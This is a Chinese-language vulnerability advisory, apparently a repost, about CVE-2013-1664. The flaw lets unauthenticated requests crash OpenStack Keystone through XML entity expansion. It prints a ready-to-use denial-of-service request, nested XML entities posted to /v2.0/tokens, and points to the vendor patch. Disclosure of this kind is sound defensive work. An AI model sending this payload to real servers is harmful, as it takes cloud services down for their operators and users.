发布日期:2013-01-16
更新日期:2013-04-07受影响系统:
openstack OpenStack Dashboard (Horizon)
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58892
CVE(CAN) ID: CVE-2013-1664
OpenStack是可大规模扩展的云操作系统。
多个OpenStack产品存在安全漏洞,远程未经认证的攻击者可利用这些漏洞使受影响应用崩溃。
<*来源:Jonathan Murray
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jonathan Murray ()提供了如下测试方法:
DoS keystone servers using XML entities in Keystone requests.
-----------------------------------------------
POST /v2.0/tokens HTTP/1.1
content-type: application/xml
<!DOCTYPE foo [
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<auth>
<tenantName>&c;</tenantName>
<passwordCredentials>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<password>&c;</password>
<somethingElse>&c;</somethingElse>
<somethingElse1>&c;</somethingElse1>
<somethingElse2>&c;</somethingElse2>
</passwordCredentials>
</auth>
-----------------------------------------------建议:
--------------------------------------------------------------------------------
厂商补丁:
openstack
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://lists.openstack.org/pipermail/openstack-announce/Huawei VSM默认用户组权限提升漏洞PostgreSQL 拒绝服务和代码执行漏洞(CVE-2013-1899)相关资讯 OpenStack安全漏洞
- OpenStack Compute (Nova) qcow2图 (05/17/2013 20:23:58)
- OpenStack Keystone 密码信息泄露 (04/28/2013 06:29:35)
- OpenStack Keystone PKI令牌撤销检 (03/22/2013 19:25:39)
| - OpenStack Keystone 令牌验证安全 (05/12/2013 07:10:28)
- OpenStack PackStack 不安全文件创 (04/12/2013 21:13:08)
- OpenStack PackStack 多个不安全文 (03/18/2013 14:41:51)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站